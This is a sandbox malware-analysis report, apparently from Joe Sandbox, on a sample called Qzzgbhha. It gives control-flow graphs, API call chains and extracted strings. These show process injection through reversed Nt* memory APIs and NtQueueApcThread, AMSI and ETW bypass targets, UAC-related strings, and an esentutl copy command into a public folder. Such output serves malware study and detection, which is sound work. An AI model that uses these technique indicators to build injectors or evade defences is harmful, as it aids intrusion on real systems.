28661->28668 28663 2d589d0 4 API calls 28662->28663 28666 2d6a58f 28663->28666 28665 2d589d0 4 API calls 28664->28665 28671 2d6902b 28665->28671 28667 2d589d0 4 API calls 28666->28667 28670 2d6a60b 28667->28670 28669 2d589d0 4 API calls 28668->28669 28676 2d66f77 28669->28676 28672 2d589d0 4 API calls 28670->28672 28673 2d589d0 4 API calls 28671->28673 28674 2d6a63e 28672->28674 28680 2d690a7 28673->28680 28675 2d589d0 4 API calls 28674->28675 28677 2d6a671 28675->28677 28678 2d589d0 4 API calls 28676->28678 28679 2d589d0 4 API calls 28677->28679 28684 2d66ff3 28678->28684 28682 2d6a6a4 28679->28682 28681 2d589d0 4 API calls 28680->28681 28687 2d69123 28681->28687 28683 2d589d0 4 API calls 28682->28683 28685 2d6a6d7 28683->28685 28684->27729 28686 2d589d0 4 API calls 28685->28686 28689 2d6a70a 28686->28689 28688 2d589d0 4 API calls 28687->28688 28691 2d6919f 28688->28691 28690 2d589d0 4 API calls 28689->28690 28699 2d6a786 28690->28699 28692 2d589d0 4 API calls 28691->28692 28693 2d6921b 28692->28693 28892 2d5894c 28693->28892 28695 2d6923a 28696 2d5894c 3 API calls 28695->28696 28697 2d6924e 28696->28697 28698 2d5894c 3 API calls 28697->28698 28700 2d69262 28698->28700 28702 2d589d0 4 API calls 28699->28702 28701 2d5894c 3 API calls 28700->28701 28703 2d69276 28701->28703 28707 2d6a802 28702->28707 28704 2d5894c 3 API calls 28703->28704 28705 2d6928a 28704->28705 28706 2d5894c 3 API calls 28705->28706 28709 2d6929e 28706->28709 28708 2d589d0 4 API calls 28707->28708 28711 2d6a87e 28708->28711 28710 2d589d0 4 API calls 28709->28710 28713 2d69325 28710->28713 28712 2d589d0 4 API calls 28711->28712 28715 2d6a8fa 28712->28715 28714 2d589d0 4 API calls 28713->28714 28714->28440 28716 2d589d0 4 API calls 28715->28716 28717 2d6a976 28716->28717 28718 2d589d0 4 API calls 28717->28718 28719 2d6a985 28718->28719 28720 2d589d0 4 API calls 28719->28720 28721 2d6a994 28720->28721 28722 2d589d0 4 API calls 28721->28722 28723 2d6a9a3 28722->28723 28724 2d589d0 4 API calls 
28723->28724 28725 2d6a9b2 28724->28725 28726 2d589d0 4 API calls 28725->28726 28727 2d6a9c1 28726->28727 28728 2d589d0 4 API calls 28727->28728 28729 2d6a9d0 28728->28729 28730 2d589d0 4 API calls 28729->28730 28731 2d6a9df 28730->28731 28732 2d589d0 4 API calls 28731->28732 28733 2d6a9ee 28732->28733 28734 2d589d0 4 API calls 28733->28734 28735 2d6a9fd 28734->28735 28736 2d589d0 4 API calls 28735->28736 28737 2d6aa0c 28736->28737 28738 2d589d0 4 API calls 28737->28738 28739 2d6aa1b 28738->28739 28740 2d589d0 4 API calls 28739->28740 28741 2d6aa2a 28740->28741 28742 2d589d0 4 API calls 28741->28742 28743 2d6aa39 28742->28743 28744 2d589d0 4 API calls 28743->28744 28745 2d6aa48 28744->28745 28746 2d589d0 4 API calls 28745->28746 28747 2d6aa57 28746->28747 28748 2d589d0 4 API calls 28747->28748 28749 2d6aad3 28748->28749 28750 2d589d0 4 API calls 28749->28750 28751 2d6ab06 28750->28751 28752 2d589d0 4 API calls 28751->28752 28753 2d6ab39 28752->28753 28754 2d589d0 4 API calls 28753->28754 28755 2d6ab6c 28754->28755 28756 2d589d0 4 API calls 28755->28756 28757 2d6ab9f 28756->28757 28758 2d589d0 4 API calls 28757->28758 28759 2d6abd2 28758->28759 28760 2d589d0 4 API calls 28759->28760 28761 2d6ac05 28760->28761 28762 2d589d0 4 API calls 28761->28762 28763 2d6ac38 28762->28763 28764 2d589d0 4 API calls 28763->28764 28765 2d6acb4 28764->28765 28766 2d589d0 4 API calls 28765->28766 28767 2d6ad30 28766->28767 28768 2d589d0 4 API calls 28767->28768 28769 2d6adac 28768->28769 28770 2d589d0 4 API calls 28769->28770 28771 2d6addf 28770->28771 28772 2d589d0 4 API calls 28771->28772 28773 2d6ae12 28772->28773 28774 2d589d0 4 API calls 28773->28774 28775 2d6ae45 28774->28775 28776 2d589d0 4 API calls 28775->28776 28777 2d6ae78 28776->28777 28778 2d589d0 4 API calls 28777->28778 28779 2d6aeab 28778->28779 28780 2d589d0 4 API calls 28779->28780 28781 2d6aede 28780->28781 28782 2d589d0 4 API calls 28781->28782 28783 2d6af11 28782->28783 28784 2d589d0 4 API calls 28783->28784 28785 
2d6af44 28784->28785 28786 2d589d0 4 API calls 28785->28786 28787 2d6af77 28786->28787 28788 2d589d0 4 API calls 28787->28788 28789 2d6afaa 28788->28789 28790 2d589d0 4 API calls 28789->28790 28791 2d6afdd 28790->28791 28792 2d589d0 4 API calls 28791->28792 28793 2d6b010 28792->28793 28794 2d589d0 4 API calls 28793->28794 28795 2d6b043 28794->28795 28796 2d589d0 4 API calls 28795->28796 28797 2d6b076 28796->28797 28798 2d589d0 4 API calls 28797->28798 28799 2d6b0a9 28798->28799 28800 2d589d0 4 API calls 28799->28800 28801 2d6b0dc 28800->28801 28802 2d589d0 4 API calls 28801->28802 28803 2d6b10f 28802->28803 28804 2d589d0 4 API calls 28803->28804 28805 2d6b142 28804->28805 28806 2d589d0 4 API calls 28805->28806 28807 2d6b175 28806->28807 28897 2d58338 28807->28897 28809 2d6b184 28810 2d589d0 4 API calls 28809->28810 28811 2d6b200 28810->28811 28812 2d589d0 4 API calls 28811->28812 28813 2d6b27c 28812->28813 28814 2d589d0 4 API calls 28813->28814 28814->28815 28817 2d588c6 28816->28817 28904 2d58274 28817->28904 28819 2d588f1 28908 2d57d78 28819->28908 28821 2d5891f 28821->27733 28823 2d589e4 28822->28823 28824 2d581cc 2 API calls 28823->28824 28825 2d58a1d 28824->28825 28826 2d58274 GetProcAddress 28825->28826 28827 2d58a36 28826->28827 28828 2d57d78 3 API calls 28827->28828 28829 2d58a95 28828->28829 28830 2d58338 3 API calls 28829->28830 28831 2d58aa4 28830->28831 28831->27738 28833 2d44871 28832->28833 28835 2d5d16d 28834->28835 28836 2d589d0 4 API calls 28835->28836 28837 2d5d1ef 28836->28837 28838 2d589d0 4 API calls 28837->28838 28839 2d5d248 28838->28839 28840 2d589d0 4 API calls 28839->28840 28841 2d5d2a1 28840->28841 28842 2d589d0 4 API calls 28841->28842 28843 2d5d2fa 28842->28843 28844 2d589d0 4 API calls 28843->28844 28845 2d5d353 28844->28845 28846 2d589d0 4 API calls 28845->28846 28847 2d5d3ac 28846->28847 28848 2d589d0 4 API calls 28847->28848 28849 2d5d405 28848->28849 28850 2d589d0 4 API calls 28849->28850 28851 2d5d470 28850->28851 28852 2d589d0 4 
API calls 28851->28852 28853 2d5d4e1 28852->28853 28854 2d5d558 28853->28854 28856 2d589d0 4 API calls 28853->28856 28855 2d589d0 4 API calls 28854->28855 28857 2d5d5c9 28855->28857 28856->28854 28858 2d589d0 4 API calls 28857->28858 28859 2d5d63a 28858->28859 28860 2d589d0 4 API calls 28859->28860 28861 2d5d6ab 28860->28861 28862 2d589d0 4 API calls 28861->28862 28863 2d5d735 28862->28863 28864 2d589d0 4 API calls 28863->28864 28865 2d5d7a6 28864->28865 28920 2d57a2c 28865->28920 28867 2d5d7be 28868 2d5d835 28867->28868 28870 2d589d0 4 API calls 28867->28870 28869 2d589d0 4 API calls 28868->28869 28871 2d5d8a6 28869->28871 28870->28868 28872 2d589d0 4 API calls 28871->28872 28873 2d5d917 28872->28873 28874 2d57d78 3 API calls 28873->28874 28875 2d5d92f 28874->28875 28876 2d589d0 4 API calls 28875->28876 28877 2d5d9a0 28876->28877 28878 2d589d0 4 API calls 28877->28878 28879 2d5da11 28878->28879 28880 2d589d0 4 API calls 28879->28880 28881 2d5da82 28880->28881 28881->28547 28883 2d581cc 2 API calls 28882->28883 28884 2d58742 28883->28884 28885 2d58274 GetProcAddress 28884->28885 28886 2d58748 NtQueueApcThread 28885->28886 28886->28596 28887->28377 28888->28503 28889->28436 28890->28566 28891->28621 28893 2d58965 28892->28893 28894 2d57d78 3 API calls 28893->28894 28895 2d589a5 28893->28895 28894->28895 28895->28695 28896->28474 28898 2d5835b 28897->28898 28899 2d581cc 2 API calls 28898->28899 28900 2d5838d 28899->28900 28901 2d58274 GetProcAddress 28900->28901 28902 2d58393 FlushInstructionCache 28901->28902 28903 2d583c1 28902->28903 28903->28809 28905 2d58299 28904->28905 28906 2d582cc GetProcAddress 28905->28906 28907 2d582fb 28906->28907 28907->28819 28909 2d57d9d 28908->28909 28915 2d581cc 28909->28915 28911 2d57dcd 28912 2d58274 GetProcAddress 28911->28912 28913 2d57dd3 NtWriteVirtualMemory 28912->28913 28914 2d57e0c 28913->28914 28914->28821 28916 2d581ef 28915->28916 28917 2d58274 GetProcAddress 28916->28917 28918 2d58215 GetModuleHandleA 28917->28918 28919 
2d5823b 28918->28919 28919->28911 28921 2d57a34 28920->28921 28922 2d581cc 2 API calls 28921->28922 28923 2d57a7e 28922->28923 28924 2d58274 GetProcAddress 28923->28924 28925 2d57a84 NtAllocateVirtualMemory 28924->28925 28926 2d57ac2 28925->28926 28926->28867
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /d $ /o$.url$<h$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                          • API String ID: 0-4272354979
                                          • Opcode ID: efb3238ac650951520d69ced458316179f023e9969ef250b039c77ad03118442
                                          • Instruction ID: 6d8385d225f72c2d34dd9dd3ce0e510ac52fff8e2e4b5ece6e61730a805f7c9b
                                          • Opcode Fuzzy Hash: efb3238ac650951520d69ced458316179f023e9969ef250b039c77ad03118442
                                          • Instruction Fuzzy Hash: E714EB74A0429D9FDB10EBA4DC85BDE73BAEF85304F5080E69409EB314DE30AE959F61

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D57A9F
                                          Strings
                                          Similarity
                                          • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                          • API String ID: 421316089-445027087
                                          • Opcode ID: 9c8cf44444ee439574f3b0befd28e264a27341bcb24a2686eff3c9cf509d2801
                                          • Instruction ID: d76f805af0d3028535ca9975dfa2bebc19c1a5fb0645ac100d47c9f604cca246
                                          • Opcode Fuzzy Hash: 9c8cf44444ee439574f3b0befd28e264a27341bcb24a2686eff3c9cf509d2801
                                          • Instruction Fuzzy Hash: D111F375644209BFEB04EFA4EC41EAABBAEEB48700F604464B904D7740DAB0AE548F64

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D57A9F
                                          Strings
                                          Similarity
                                          • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                          • API String ID: 421316089-445027087
                                          • Opcode ID: e43665b48a1c76d1b0c9c1b502efdd99b7023719a0d3e1110483d06fc543ec09
                                          • Instruction ID: 247a5a700675a5a2896fe19a6cb1640dff63ab9403e4d070ba1b9b446412909c
                                          • Opcode Fuzzy Hash: e43665b48a1c76d1b0c9c1b502efdd99b7023719a0d3e1110483d06fc543ec09
                                          • Instruction Fuzzy Hash: 3D110575644209BFEB04EFA4EC41F9ABBAEEB48700F604464B904D7740DAB0AE548F74

                                          Control-flow Graph

                                          control_flow_graph 11500 2d57ac9 11501 2d57a56 11500->11501 11502 2d57a34-2d57a54 call 2d44530 11501->11502 11503 2d57a58-2d57ac2 call 2d5798c call 2d447ec call 2d449a0 call 2d581cc call 2d58274 NtAllocateVirtualMemory call 2d44500 11501->11503 11502->11501
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D57A9F
                                          Strings
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                          • API String ID: 2167126740-445027087
                                          • Opcode ID: 472a85a54814839b50b34893d066e1a21c1784187c8f66c623746c60d727451e
                                          • Instruction ID: 35f7eb7445085449c230ae6651e20f4e9de5061b09ce5a0a5991b7c7848e67cf
                                          • Opcode Fuzzy Hash: 472a85a54814839b50b34893d066e1a21c1784187c8f66c623746c60d727451e
                                          • Instruction Fuzzy Hash: 18011775644219AFFF04EFA4EC51EAEBBADEB48700F604864BD18D7700DA70AE548F64

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D57DEC
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                          • String ID: Ntdll$yromeMlautriVetirW
                                          • API String ID: 4260932595-3542721025
                                          • Opcode ID: 45f06e40d182fa2d38eb6a632028f31fb5a90a36bac869e92faf646467c9f495
                                          • Instruction ID: a3070bd66b8a7593bdba0fe2e4804fa2722db1886392e19f54e3dc3f97ca8749
                                          • Opcode Fuzzy Hash: 45f06e40d182fa2d38eb6a632028f31fb5a90a36bac869e92faf646467c9f495
                                          • Instruction Fuzzy Hash: BA010C7564021AAFEF00EF98EC41E9ABBEEEB89700F604850BD04D7740DA70AD558F74

                                          Control-flow Graph

                                          control_flow_graph 11533 2d58730-2d58768 call 2d581cc call 2d58274 NtQueueApcThread
                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02D58761
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProcQueueThread
                                          • String ID: NtQueueApcThread$ntdll
                                          • API String ID: 1843393797-1374908105
                                          • Opcode ID: 5c6abb26e7e14e61697151b2b8c1b43cb0526aa8d930c279f992bbbbe10c5e5c
                                          • Instruction ID: 2b8629e37c5dfbea1489f5a5ddaac7151b9463796c46048de5a3438d15903d30
                                          • Opcode Fuzzy Hash: 5c6abb26e7e14e61697151b2b8c1b43cb0526aa8d930c279f992bbbbe10c5e5c
                                          • Instruction Fuzzy Hash: 70E026B278021AAF9F40EED9E845D8B7BECAB09650B044401FE19D7301C6B4ED609F71

                                          Control-flow Graph

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 586fd806b080057bb9b7d35fbacb1c00cdf25cd9f34876aeb7ebb04196180134
                                          • Instruction ID: a332d7ea242f086514b8fb752eea7625be3fd2dbcad72bc3a8f3a39c0dd6a387
                                          • Opcode Fuzzy Hash: 586fd806b080057bb9b7d35fbacb1c00cdf25cd9f34876aeb7ebb04196180134
                                          • Instruction Fuzzy Hash: 8021C071A40618BBEB51EA94CC52FDE77BEEB48700F500465B601E72C0EAB4AE449B75
                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • FlushInstructionCache.KERNEL32(?,?,?), ref: 02D583A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressCacheFlushHandleInstructionModuleProc
                                          • String ID: FlushInstructionCache$Kernel32
                                          • API String ID: 2392256011-184458249
                                          APIs
                                          • GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressProc
                                          • String ID: Kernel32$sserddAcorPteG
                                          • API String ID: 190572456-1372893251
                                          APIs
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                          • API String ID: 1646373207-1952140341